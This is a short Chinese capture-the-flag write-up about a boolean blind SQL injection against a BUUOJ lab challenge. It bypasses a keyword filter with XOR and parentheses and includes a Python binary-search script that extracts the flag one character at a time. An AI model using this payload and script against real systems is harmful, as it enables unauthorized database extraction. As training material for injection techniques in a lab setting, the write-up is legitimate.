输入1/1结果回显了Hello, glzjin wants a girlfriend.
于是我们判断它是数字型注入
试了半天发现他过滤了 or union and ,但好像没有过滤()
使用bool(false)盲注,而且用到了异或,这东西相当于or的用法
0^0 //false
0^1 //true
于是构造payload:0^(ascii(substr((select(flag)from(flag)),1,1))>1)
发现这个东西不能注入太快要不然就不让访问好像,所以要注意节奏。
淘的大佬的二分脚本
import requests
import time
url = "http://5630e1a6-6a3b-46f3-b10c-3c93b8f50376.node3.buuoj.cn/
/index.php"
payload = {
"id" : ""
}
result = ""
for i in range(1,100):
l = 33
r =130
mid = (l+r)>>1
while(l<r):
payload["id"] = "0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i,mid)
html = requests.post(url,data=payload)
print(payload)
if "Hello" in html.text:
l = mid+1
else:
r = mid
mid = (l+r)>>1
if(chr(mid)==" "):
break
result = result + chr(mid)
print(result)
print("flag: " ,result)